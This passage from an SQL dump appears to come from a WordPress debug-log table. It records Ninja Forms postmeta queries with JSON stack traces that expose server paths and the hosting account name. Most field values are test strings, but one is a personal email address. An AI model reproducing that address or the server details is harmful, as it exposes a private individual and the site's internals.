4\')',NULL,NULL),(82,41,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(83,42,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_302\' AND post_id = 162776',NULL,NULL),(84,42,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(85,43,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162776, \'_field_302\', \'TEST---5\')',NULL,NULL),(86,43,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(87,44,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_303\' AND post_id = 162776',NULL,NULL),(88,44,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(89,45,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162776, \'_field_303\', \'Testing---5\')',NULL,NULL),(90,45,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(91,46,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_304\' AND post_id = 162776',NULL,NULL),(92,46,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(93,47,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162776, \'_field_304\', \'choll.03@comcast.net\')',NULL,NULL),(94,47,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(95,48,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_306\' AND post_id = 162776',NULL,NULL),(96,48,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(97,49,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162776, \'_field_306\', \'TESTING--------------5\')',NULL,NULL),(98,49,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(99,50,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_307\' AND post_id = 